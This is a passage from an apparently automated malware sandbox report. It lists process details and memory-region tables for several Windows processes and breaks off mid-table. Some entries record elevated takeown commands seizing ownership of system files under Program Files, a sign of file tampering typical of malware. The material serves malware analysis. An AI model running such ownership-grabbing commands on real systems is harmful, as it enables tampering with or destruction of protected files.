| private_0x00000000009c0000 | 0x009c0000 | 0x009c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c50000 | 0x00c50000 | 0x00dd7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06630000 | 0x06966fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f310000 | 0x7f310000 | 0x7f40ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f410000 | 0x7f410000 | 0x7f432fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f434000 | 0x7f434000 | 0x7f436fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f437000 | 0x7f437000 | 0x7f439fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f43a000 | 0x7f43a000 | 0x7f43afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f43d000 | 0x7f43d000 | 0x7f43dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #148: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #148 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed4 |
| Parent PID | 0xa84 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
90C
0x
D78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c80000 | 0x00c80000 | 0x00c9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c80000 | 0x00c80000 | 0x00c8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00c93fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00ca1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00ca0000 | 0x00ca4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x00cc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d50000 | 0x00d50000 | 0x00d53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00d60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00d71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d80000 | 0x00e3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00ed0000 | 0x00ef9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00ed0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00ee0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f20000 | 0x00f20000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x0119ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053c0000 | 0x053c0000 | 0x05540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005550000 | 0x05550000 | 0x0694ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06950000 | 0x06c86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3d0000 | 0x7f3d0000 | 0x7f4cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4d0000 | 0x7f4d0000 | 0x7f4f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f4f6000 | 0x7f4f6000 | 0x7f4f6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4f7000 | 0x7f4f7000 | 0x7f4f9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4fa000 | 0x7f4fa000 | 0x7f4fcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4fd000 | 0x7f4fd000 | 0x7f4fdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #149: wmiadap.exe
0
0
| Information | Value |
|---|---|
| ID | #149 |
| File Name | c:\windows\system32\wbem\wmiadap.exe |
| Command Line | wmiadap.exe /F /T /R |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:54, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd80 |
| Parent PID | 0x324 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
D7C
0x
A60
0x
2F4
0x
B20
0x
504
0x
79C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000002dc6c10000 | 0x2dc6c10000 | 0x2dc6c2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002dc6c10000 | 0x2dc6c10000 | 0x2dc6c1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000002dc6c20000 | 0x2dc6c20000 | 0x2dc6c26fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002dc6c30000 | 0x2dc6c30000 | 0x2dc6c43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002dc6c50000 | 0x2dc6c50000 | 0x2dc6ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002dc6cd0000 | 0x2dc6cd0000 | 0x2dc6cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002dc6ce0000 | 0x2dc6ce0000 | 0x2dc6ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002dc6cf0000 | 0x2dc6cf0000 | 0x2dc6cf1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc6d00000 | 0x2dc6d00000 | 0x2dc6d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc6d10000 | 0x2dc6d10000 | 0x2dc6d16fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc6d20000 | 0x2dc6d20000 | 0x2dc6d20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc6d30000 | 0x2dc6d30000 | 0x2dc6d30fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002dc6d40000 | 0x2dc6d40000 | 0x2dc6d40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002dc6d50000 | 0x2dc6d50000 | 0x2dc6e4ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x2dc6e50000 | 0x2dc6f0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002dc6f10000 | 0x2dc6f10000 | 0x2dc6f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc6f90000 | 0x2dc6f90000 | 0x2dc700ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002dc7010000 | 0x2dc7010000 | 0x2dc7197fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002dc71a0000 | 0x2dc71a0000 | 0x2dc7320fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002dc7330000 | 0x2dc7330000 | 0x2dc73effff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x2dc73f0000 | 0x2dc74c5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000002dc73f0000 | 0x2dc73f0000 | 0x2dc73f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| ole32.dll | 0x2dc7400000 | 0x2dc7540fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0x2dc7400000 | 0x2dc7736fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002dc7740000 | 0x2dc7740000 | 0x2dc77bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc77c0000 | 0x2dc77c0000 | 0x2dc783ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002dc7840000 | 0x2dc7840000 | 0x2dc78bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff1c0000 | 0x7df5ff1c0000 | 0x7ff5ff1bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff79042e000 | 0x7ff79042e000 | 0x7ff79042ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff790430000 | 0x7ff790430000 | 0x7ff79052ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff790530000 | 0x7ff790530000 | 0x7ff790552fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff790554000 | 0x7ff790554000 | 0x7ff790555fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff790556000 | 0x7ff790556000 | 0x7ff790557fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff790558000 | 0x7ff790558000 | 0x7ff790559fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79055a000 | 0x7ff79055a000 | 0x7ff79055bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79055c000 | 0x7ff79055c000 | 0x7ff79055dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79055e000 | 0x7ff79055e000 | 0x7ff79055efff | Private Memory | rw |
|
|
|
- |
| wmiadap.exe | 0x7ff790ad0000 | 0x7ff790afefff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ffc496f0000 | 0x7ffc49703fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ffc49710000 | 0x7ffc49807fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ffc4a370000 | 0x7ffc4a380fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ffc4d910000 | 0x7ffc4d98efff | Memory Mapped File | rwx |
|
|
|
- |
| loadperf.dll | 0x7ffc50610000 | 0x7ffc50634fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x7ffc57a20000 | 0x7ffc57a27fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #150: mpcmdrun.exe
0
0
| Information | Value |
|---|---|
| ID | #150 |
| File Name | c:\program files\windows defender\mpcmdrun.exe |
| Command Line | "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:54, Reason: Child Process |
| Unmonitor | End Time: 00:03:00, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0x32c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EA0
0x
F6C
0x
458
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000002e66da0000 | 0x2e66da0000 | 0x2e66dbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002e66da0000 | 0x2e66da0000 | 0x2e66daffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000002e66db0000 | 0x2e66db0000 | 0x2e66db6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002e66dc0000 | 0x2e66dc0000 | 0x2e66dd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002e66de0000 | 0x2e66de0000 | 0x2e66e5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002e66e60000 | 0x2e66e60000 | 0x2e66e63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002e66e70000 | 0x2e66e70000 | 0x2e66e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002e66e80000 | 0x2e66e80000 | 0x2e66e81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x2e66e90000 | 0x2e66f4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002e66f50000 | 0x2e66f50000 | 0x2e66f56fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002e66f60000 | 0x2e66f60000 | 0x2e66f60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002e66f70000 | 0x2e66f70000 | 0x2e66f70fff | Private Memory | rw |
|
|
|
- |
| msmplics.dll | 0x2e66f80000 | 0x2e66f81fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002e66fa0000 | 0x2e66fa0000 | 0x2e6709ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002e670a0000 | 0x2e670a0000 | 0x2e6711ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002e67120000 | 0x2e67120000 | 0x2e671cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002e67120000 | 0x2e67120000 | 0x2e6719ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002e671c0000 | 0x2e671c0000 | 0x2e671cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002e671d0000 | 0x2e671d0000 | 0x2e67357fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002e67360000 | 0x2e67360000 | 0x2e674e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002e674f0000 | 0x2e674f0000 | 0x2e675affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002e675b0000 | 0x2e675b0000 | 0x2e676affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff390000 | 0x7df5ff390000 | 0x7ff5ff38ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff701820000 | 0x7ff701820000 | 0x7ff70191ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff701920000 | 0x7ff701920000 | 0x7ff701942fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff701944000 | 0x7ff701944000 | 0x7ff701944fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70194a000 | 0x7ff70194a000 | 0x7ff70194bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70194c000 | 0x7ff70194c000 | 0x7ff70194dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70194e000 | 0x7ff70194e000 | 0x7ff70194ffff | Private Memory | rw |
|
|
|
- |
| mpcmdrun.exe | 0x7ff701c10000 | 0x7ff701c66fff | Memory Mapped File | rwx |
|
|
|
- |
| mpclient.dll | 0x7ffc401d0000 | 0x7ffc402a9fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffc4b6e0000 | 0x7ffc4b6ebfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ffc4f660000 | 0x7ffc4f686fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffc54ca0000 | 0x7ffc54cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #151: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #151 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:03:01, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd70 |
| Parent PID | 0x85c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
368
0x
E38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002c0000 | 0x002c0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x002e0000 | 0x002e4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x00303fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00393fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | r |
|
|
|
- |
